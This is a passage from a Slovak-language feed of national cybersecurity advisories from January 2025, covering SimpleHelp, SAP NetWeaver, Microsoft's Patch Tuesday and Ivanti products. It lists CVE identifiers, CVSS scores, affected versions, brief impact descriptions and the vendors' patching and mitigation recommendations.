<p>Výrobca odporúča bezodkladnú aktualizáciu zasiahnutých systémov na verzie v5.5.8, v5.4.10 alebo v5.3.9, preventívnu zmenu hesiel administrátorských a&nbsp;technických účtov a&nbsp;limitovanie prihlasovania k&nbsp;týmto účtom len na dôveryhodné IP adresy.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://simple-help.com/kb---security-vulnerabilities-01-2025#suggested-action-summary">https://simple-help.com/kb&#8212;security-vulnerabilities-01-2025#suggested-action-summary</a></li>



<li><a href="https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/">https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/</a></li>



<li><a href="https://thehackernews.com/2025/01/critical-simplehelp-flaws-allow-file.html">https://thehackernews.com/2025/01/critical-simplehelp-flaws-allow-file.html</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-57726">https://www.cve.org/CVERecord?id=CVE-2024-57726</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-57727">https://www.cve.org/CVERecord?id=CVE-2024-57727</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-57728">https://www.cve.org/CVERecord?id=CVE-2024-57728</a></li>



<li><a href="https://arcticwolf.com/resources/blog-uk/arctic-wolf-observes-campaign-exploiting-simplehelp-rmm-software-initial-access/">https://arcticwolf.com/resources/blog-uk/arctic-wolf-observes-campaign-exploiting-simplehelp-rmm-software-initial-access/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1928/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti vo webových aplikačných serveroch SAP NetWeaver</title>
		<link>/posts/1925</link>
					<comments>/posts/1925#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 17 Jan 2025 14:05:42 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[NetWeaver]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[SAP]]></category>
		<guid isPermaLink="false">/?p=1925</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/01/SAP-Netweaver.jpg" alt="" /></p>Spoločnosť SAP vydala bezpečnostné aktualizácie svojho webového aplikačného servera NetWeaver, ktoré opravujú 8 zraniteľností, z&#160;čoho 2 sú označené ako kritické....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/01/SAP-Netweaver.jpg" alt="" /></p>
<p><strong>Spoločnosť SAP vydala bezpečnostné aktualizácie svojho webového aplikačného servera NetWeaver, ktoré opravujú 8 zraniteľností, z&nbsp;čoho 2 sú označené ako kritické. CVE-2025-0070 a CVE-2025-0066 možno zneužiť na eskaláciu privilégií a získanie neoprávneného prístupu k citlivým údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SAP NetWeaver Application Server Java vo verzii WD-RUNTIME 7.50</li>



<li>SAP NetWeaver AS JAVA (User Admin Application) vo verziách ENGINEAPI 7.50, SERVERCORE 7.50, UMEADMIN 7.50</li>



<li>SAP NetWeaver Application Server for ABAP and ABAP Platform vo verziách 7.22EXT, 7.53, 7.54, 7.77, 7.89, 7.93, 7.97, 8.04, 9.12, 9.13, 9.14, KERNEL 7.22, KERNEL 7.53, KRNL64NUC 7.22, KRNL64UC 7.22, KRNL64UC 7.53</li>



<li>SAP NetWeaver Application Server for ABAP and ABAP Platform vo verziách SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 758, SAP_BASIS 912, SAP_BASIS 913, SAP_BASIS 914</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-0070 </strong>(CVSS skóre 9,9)</p>



<p>Bližšie nešpecifikovaná kritická zraniteľnosť spočíva v&nbsp;nedostatočnej implementácii mechanizmov autentifikácie a&nbsp;vzdialený autentifikovaný útočník by ju mohol zneužiť na <strong>eskaláciu privilégií</strong> a&nbsp;<strong>úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong>.</p>



<p><strong>CVE-2025-0066 </strong>(CVSS skóre 9,9)</p>



<p>Kritická zraniteľnosť spočívajúcu v&nbsp;nesprávnom riadení prístupov by vzdialený autentifikovaný útočník mohol zneužiť na <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong> a <strong>úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong>.</p>



<p><strong>CVE-2025-0063 </strong>(CVSS skóre 8,8)</p>



<p>Zraniteľnosť spočíva v&nbsp;nedostatočnom overovaní autorizácie pre niektoré moduly RFC a&nbsp;vzdialený autentifikovaný útočník by ju prostredníctvom <strong>SQL injekcie</strong> mohol zneužiť na <strong>získanie neoprávneného prístupu k databáze&nbsp;Informix</strong>.</p>



<p><strong>Ostatné zraniteľnosti možno zneužiť na vzdialené vykonanie kódu a&nbsp;získanie neoprávneného prístupu k&nbsp;citlivým údajom.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame bezodkladnú aktualizáciu zasiahnutých systémov na <a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news/january-2025.html">verzie špecifikované výrobcom</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news/january-2025.html">https://support.sap.com/en/my-support/knowledge-base/security-notes-news/january-2025.html</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-0070">https://www.cve.org/CVERecord?id=CVE-2025-0070</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-0066">https://www.cve.org/CVERecord?id=CVE-2025-0066</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-0063">https://www.cve.org/CVERecord?id=CVE-2025-0063</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/sap-fixes-critical-vulnerabilities-in-netweaver-application-servers/">https://www.bleepingcomputer.com/news/security/sap-fixes-critical-vulnerabilities-in-netweaver-application-servers/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1925/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v januárovom Patch Tuesday opravil 12 kritických zraniteľností</title>
		<link>/posts/1923</link>
					<comments>/posts/1923#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 17 Jan 2025 13:46:06 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Spoofing]]></category>
		<guid isPermaLink="false">/?p=1923</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala v&#160;januári 2025 balík opráv pre portfólio svojich produktov opravujúci 161 zraniteľností, z&#160;ktorých 58 umožňuje vzdialené vykonanie kódu....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v&nbsp;januári 2025 balík opráv pre portfólio svojich produktov opravujúci 161 zraniteľností, z&nbsp;ktorých 58 umožňuje vzdialené vykonanie kódu. Kritické zraniteľnosti sa nachádzajú v&nbsp;Microsoft Digest Authentication, NEGOEX, BranchCache, Windows Remote Desktop Services, Windows OLE, Windows RMCAST, Windows NTLM V1, Azure Marketplace SaaS Resources, Microsoft Purview a Microsoft Excel a&nbsp;možno ich zneužiť vzdialené vykonanie škodlivého kódu, eskaláciu privilégií a&nbsp;získanie neoprávneného prístupu k&nbsp;citlivým údajom. Windows Hyper-V NT Kernel Integration VSP obsahuje aktívne zneužívané zraniteľnosti umožňujúce eskaláciu privilégií (CVE-2025-21333, CVE-2025-21334, CVE-2025-21335).</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>.NET 8.0 installed on Linux</li>



<li>.NET 8.0 installed on Mac OS</li>



<li>.NET 8.0 installed on Windows</li>



<li>.NET 9.0 installed on Linux</li>



<li>.NET 9.0 installed on Mac OS</li>



<li>.NET 9.0 installed on Windows</li>



<li>Marketplace SaaS</li>



<li>Microsoft .NET Framework 3.5 AND 4.6.2/4.7/4.7.1/4.7.2</li>



<li>Microsoft .NET Framework 3.5 AND 4.7.2</li>



<li>Microsoft .NET Framework 3.5 AND 4.8</li>



<li>Microsoft .NET Framework 3.5 AND 4.8.1</li>



<li>Microsoft .NET Framework 4.6.2</li>



<li>Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2</li>



<li>Microsoft .NET Framework 4.6/4.6.2</li>



<li>Microsoft .NET Framework 4.8</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft Access 2016 (32-bit edition)</li>



<li>Microsoft Access 2016 (64-bit edition)</li>



<li>Microsoft AutoUpdate for Mac</li>



<li>Microsoft Edge (Chromium-based)</li>



<li>Microsoft Excel 2016 (32-bit edition)</li>



<li>Microsoft Excel 2016 (64-bit edition)</li>



<li>Microsoft Office 2016 (32-bit edition)</li>



<li>Microsoft Office 2016 (64-bit edition)</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Office LTSC 2024 for 32-bit editions</li>



<li>Microsoft Office LTSC 2024 for 64-bit editions</li>



<li>Microsoft Office LTSC for Mac 2021</li>



<li>Microsoft Office LTSC for Mac 2024</li>



<li>Microsoft Office for Android</li>



<li>Microsoft Office for Mac</li>



<li>Microsoft Office for Universal</li>



<li>Microsoft Office for iOS</li>



<li>Microsoft OneNote for Mac</li>



<li>Microsoft Outlook 2016 (32-bit edition)</li>



<li>Microsoft Outlook 2016 (64-bit edition)</li>



<li>Microsoft Outlook for Mac</li>



<li>Microsoft Purview</li>



<li>Microsoft SharePoint Enterprise Server 2016</li>



<li>Microsoft SharePoint Server 2019</li>



<li>Microsoft SharePoint Server Subscription Edition</li>



<li>Microsoft Visual Studio 2017 version 15.9 (includes 15.0 &#8211; 15.8)</li>



<li>Microsoft Visual Studio 2019 version 16.11 (includes 16.0 &#8211; 16.10)</li>



<li>Microsoft Visual Studio 2022 version 17.10</li>



<li>Microsoft Visual Studio 2022 version 17.12</li>



<li>Microsoft Visual Studio 2022 version 17.6</li>



<li>Microsoft Visual Studio 2022 version 17.8</li>



<li>Office Online Server</li>



<li>On-Premises Data Gateway</li>



<li>Power Automate for Desktop</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>



<li>Windows Server 2025</li>



<li>Windows Server 2025 (Server Core installation)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<ol style="list-style-type:upper-roman">
<li><strong></strong><strong>Kritické zraniteľnosti:</strong></li>
</ol>



<p><strong>CVE-2025-21298 </strong>(CVSS skóre 9,8)</p>



<p>Zraniteľnosť v&nbsp;komponente <strong>Windows OLE (Object Linking and Embeding)</strong> využívanom v&nbsp;rámci e-mailového klienta <strong>Microsoft Outlook</strong> by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených e-mailov mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>. Úspešné zneužitie zraniteľnosti vyžaduje zobrazenie náhľadu alebo otvorenie špeciálne vytvorenej e-mailovej správy. <strong>Spoločnosť Microsoft odporúča nastaviť Microsoft Outlook, aby e-mailové správy zobrazoval v&nbsp;plaintextovom režime</strong>, v&nbsp;rámci ktorého nedochádza k&nbsp;zobrazeniu obrázkov, špecializovaných fontov, animácií a&nbsp;ďalšieho zneužiteľného obsahu. <a href="https://support.microsoft.com/en-us/office/read-email-messages-in-plain-text-16dfe54a-fadc-4261-b2ce-19ad072ed7e3"><strong>Kompletný návod</strong></a><strong> môžete nájsť na stránke výrobcu.</strong></p>



<p><strong>CVE-2025-21307 </strong>(CVSS skóre 9,8)</p>



<p>Použitie odalokovaného miesta v&nbsp;pamäti v&nbsp;rámci ovládača <strong>Windows RMCAST (Reliable Multicast Transport)</strong> možno zaslaním špeciálne vytvorených paketov na otvorené PGM (Pragmatic General Multicast) sockety zneužiť na <strong>vzdialené vykonanie kódu</strong>. Zraniteľnosť je možné zneužiť len na systémoch, na ktorých je prítomný program počúvajúci na PGM porte. Nakoľko PGM nevykonáva autentifikáciu prichádzajúcich požiadaviek, spoločnosť <strong>Microsoft odporúča PGM porty neprevádzkovať voľne dostupné z&nbsp;internetu a prístup k&nbsp;nim limitovať prostredníctvom sieťových a&nbsp;bezpečnostných prvkov</strong>.</p>



<p><strong>CVE-2025-21311 </strong>(CVSS skóre 9,8)</p>



<p>Komponent <strong>Windows NTLM V1</strong> obsahuje kritickú zraniteľnosť, ktorá spočíva v&nbsp;nesprávnej implementácii mechanizmov autentifikácie. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>eskaláciu privilégií</strong> a&nbsp;<strong>úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong>. <strong>Zraniteľnosť je možné mitigovať nastavením LmCompatabilityLvl na hodnotu 5</strong> (maximálna možná hodnota), čo na systémoch znemožní využitie starého protokolu NTLMv1. <a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level"><strong>Bližšie informácie</strong></a><strong> môžete nájsť na stránke výrobcu.</strong></p>



<p><strong>CVE-2025-21380 </strong>(CVSS skóre 8,8)</p>



<p>Bližšie nešpecifikovaná zraniteľnosť v <strong>Azure Marketplace SaaS Resources</strong> spočíva v&nbsp;nesprávnej implementácii mechanizmov riadenia prístupu a&nbsp;vzdialený autentifikovaný útočník by ju mohol zneužiť na <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong>. Zraniteľnosť bola automaticky opravená spoločnosťou Microsoft a&nbsp;nevyžaduje dodatočnú aktualizáciu systémov.</p>



<p><strong>CVE-2025-21385 </strong>(CVSS skóre 8,8)</p>



<p><strong>Microsoft Purview</strong> obsahuje zraniteľnosť, ktorú by vzdialený autentifikovaný útočník mohol zneužiť na realizáciu <strong>SSRF</strong> (Server Side Request Forgery) útokov a&nbsp;následné <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong>. Zraniteľnosť bola automaticky opravená spoločnosťou Microsoft a nevyžaduje dodatočnú aktualizáciu systémov.</p>



<p><strong>CVE-2025-21354, CVE-2025-21362</strong> (CVSS skóre 8,4)</p>



<p>Kritické zraniteľnosti v&nbsp;<strong>Microsoft Excel</strong> spočívajú v&nbsp;dereferencii nedôveryhodného ukazovateľa (CVE-2025-21354) a&nbsp;použití odalokovaného miesta v&nbsp;pamäti (CVE-2025-21362). Lokálny neautentifikovaný útočník by ich mohol zneužiť na <strong>vykonanie kódu</strong>.</p>



<p><strong>CVE-2025-21297, CVE-2025-21309 </strong>(CVSS skóre 8,1)</p>



<p>Komponent <strong>Windows Remote Desktop Services</strong> obsahuje dve kritické zraniteľnosti, ktoré možno zneužiť na <strong>vzdialené vykonanie kódu</strong>. Prvá zraniteľnosť s&nbsp;označením CVE-2025-21297 spočíva v&nbsp;použití odalokovaného miesta v&nbsp;pamäti. CVE-2025-21309 spočíva v&nbsp;ukladaní citlivých dát v&nbsp;nesprávne uzamknutej pamäti. Zraniteľnosti možno zneužiť pripojením sa na zraniteľné systémy v konfigurácii Remote Desktop Gateway. Úspešné zneužitie zraniteľností vyžaduje, aby útočník vyhral súbeh procesov.</p>



<p><strong>CVE-2025-21294 </strong>(CVSS skóre 8,1)</p>



<p>Komponent <strong>Microsoft Digest Authentication</strong> obsahuje zraniteľnosť, ktorá spočíva v&nbsp;ukladaní citlivých údajov v&nbsp;nesprávne uzamknutej pamäti a&nbsp;umožňuje <strong>vzdialené vykonanie kódu</strong>. Zraniteľnosť možno zneužiť pripojením sa na systémy využívajúce autentifikáciu prostredníctvom Digest Authentication, pričom pre úspešné zneužitie zraniteľnosti je potrebné, aby útočník vyhral súbeh procesov.</p>



<p><strong>CVE-2025-21295 </strong>(CVSS skóre 8,1)</p>



<p>Zraniteľnosť s&nbsp;identifikátorom CVE-2025-21295 sa nachádza v&nbsp;bezpečnostnom mechanizme <strong>SPNEGO Extended Negotiation (NEGOEX)</strong> a&nbsp;vzdialený neautentifikovaný útočník vy ju mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>CVE-2025-21296 </strong>(CVSS skóre 7,5)</p>



<p>Zraniteľnosť v&nbsp;komponente <strong>BranchCache</strong> by neautentifikovaný útočník nachádzajúci sa v&nbsp;rovnakom sieťovom segmente mohol zneužiť na <strong>vykonanie kódu</strong>. CVE-2025-21296 spočíva v&nbsp;použití odalokovaného miesta v&nbsp;pamäti. Úspešné zneužitie zraniteľnosti vyžaduje, aby útočník vyhral súbeh procesov.</p>



<ol style="list-style-type:upper-roman">
<li><strong></strong><strong>Aktívne zneužívané zraniteľnosti:</strong></li>
</ol>



<p><strong>CVE-2025-21333, CVE-2025-21334 a CVE-2025-21335</strong> (CVSS skóre 7,8)</p>



<p>Zraniteľnosti nachádzajúce sa v ovládači <strong>NT Kernel Integration VSP</strong>, ktorý je súčasťou hypervízora <strong>Windows Hyper-V</strong> spočívajú v&nbsp;použití odalokovaného miesta v&nbsp;pamäti (CVE-2025-21334, CVE-2025-21335) a&nbsp;pretečení medzipamäte haldy (CVE-2025-21333). Lokálny autentifikovaný útočník by ich mohol zneužiť na <strong>eskaláciu privilégií</strong> na úroveň oprávnení SYSTEM. Zraniteľnosti sú v&nbsp;súčasnosti aktívne zneužívané útočníkmi.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Zneprístupnenie služby (DoS)</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Spoofing</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladné nasadenie januárového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete&nbsp;</strong><a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Jan">tu</a><strong>.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Jan">https://msrc.microsoft.com/update-guide/releaseNote/2025-Jan</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21294">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21294</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21295">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21295</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21296">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21296</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21297">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21297</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21298">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21298</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21307">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21307</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21309">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21309</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21311">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21311</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21354">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21354</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21362">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21362</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21380">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21380</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21385">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21385</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21333">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21333</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21334">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21334</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21335">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21335</a></li>



<li><a href="https://thehackernews.com/2025/01/3-actively-exploited-zero-day-flaws.html">https://thehackernews.com/2025/01/3-actively-exploited-zero-day-flaws.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1923/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produktoch Ivanti Endpoint Manager, Avalanche, Application Control Engine</title>
		<link>/posts/1921</link>
					<comments>/posts/1921#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 17 Jan 2025 13:34:52 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Ivanti]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1921</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre svoje produkty Endpoint Manager (EPM), Avalanche, Application Control Engine, ktoré opravujú 20 zraniteľností, z&#160;ktorých...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre svoje produkty Endpoint Manager (EPM), Avalanche, Application Control Engine, ktoré opravujú 20 zraniteľností, z&nbsp;ktorých 4 sú označené ako kritické. Kritické zraniteľnosti s označením CVE-2024-10811, CVE-2024-13161, CVE-2024-13160 a CVE-2024-13159 sa nachádzajú v produkte EPM a vzdialený neautentifikovaný útočník by ich mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ivanti Endpoint Manager 2022 SU6 bez bezpečnostných záplat z&nbsp;januára 2025</li>



<li>Ivanti Endpoint Manager 2024 bez bezpečnostných záplat z&nbsp;januára 2025</li>



<li>Ivanti Avalanche vo verziách starších ako 6.4.7</li>



<li>Ivanti Application Control Engine 2024.3 bez bezpečnostných záplat HF1</li>



<li>Ivanti Application Control Engine 2024.1 bez bezpečnostných záplat HF2</li>



<li>Ivanti Application Control Engine 2023.3 bez bezpečnostných záplat HF3</li>



<li>Ivanti Security Controls vo verziách starších ako 2024.4.1 (ukončená podpora)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Ivanti Endpoint Manager:</u></strong></p>



<p><strong>CVE-2024-10811, CVE-2024-13159, CVE-2024-13160, CVE-2024-13161 </strong>(CVSS skóre 9,8)</p>



<p>Bližšie nešpecifikované kritické zraniteľnosti v produkte Ivanti Endpoint Manager (EPM) by vzdialený neautentifikovaný útočník mohol zneužiť na získanie <strong>neoprávneného prístupu k citlivým údajom</strong>. Uvedené údaje možno následne zneužiť na získanie úplnej kontroly nad systémom.</p>



<p><strong><u>Ivanti Avalanche:</u></strong></p>



<p><strong>CVE-2024-13179, CVE-2024-13181 </strong>(CVSS skóre 7,3)</p>



<p>Vysoko závažné zraniteľnosti s&nbsp;označením CVE-2024-13179 a CVE-2024-13181 by vzdialený neautentifikovaný útočník mohol zneužiť na <strong>obídenie mechanizmov autentifikácie</strong> a&nbsp;<strong>získanie neoprávneného prístupu do systému</strong>.</p>



<p><strong>CVE-2024-13180 </strong>(CVSS skóre 7,5)</p>



<p>Zraniteľnosť možno zneužiť na <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong>.</p>



<p><strong><u>Ivanti Application Control:</u></strong></p>



<p><strong>CVE-2024-10630 </strong>(CVSS skóre 7,8)</p>



<p>Vysoko závažná zraniteľnosť v&nbsp;produkte Ivanti Application Control Engine spočíva v&nbsp;súbehu procesov a&nbsp;lokálny autentifikovaný útočník by ju mohol zneužiť na <strong>obídenie bezpečnostných mechanizmov aplikácie</strong> a&nbsp;úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Získanie neoprávneného prístupu do systému</strong><strong></strong></li>



<li><strong>Získanie neoprávneného prístupu k citlivým údajom</strong><strong></strong></li>



<li><strong>Vzdialené vykonanie kódu</strong><strong></strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Zneprístupnenie služby (DoS)</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Výrobca odporúča používať len verzie s&nbsp;platnou technickou podporou a&nbsp;vykonať bezodkladnú aktualizáciu zasiahnutých systémov na najnovšie verzie:</p>



<ul>
<li>Ivanti Endpoint Manager 2022 SU6 January-2025 Security Update</li>



<li>Ivanti Endpoint Manager 2024 January-2025 Security Update</li>



<li>Ivanti Avalanche v 6.4.7</li>



<li>Ivanti Application Control Engine 2024.3 HF1</li>



<li>Ivanti Application Control Engine 2024.1 HF2</li>



<li>Ivanti Application Control Engine 2023.3 HF3</li>
</ul>



<p>Vzhľadom na to, že 31. decembra 2024 skončila technická podpora produktu Ivanti Security Controls, výrobca odporúča migráciu na produkt Ivanti Application Control.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.ivanti.com/blog/january-security-update">https://www.ivanti.com/blog/january-security-update</a></li>



<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6">https://forums.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6</a></li>



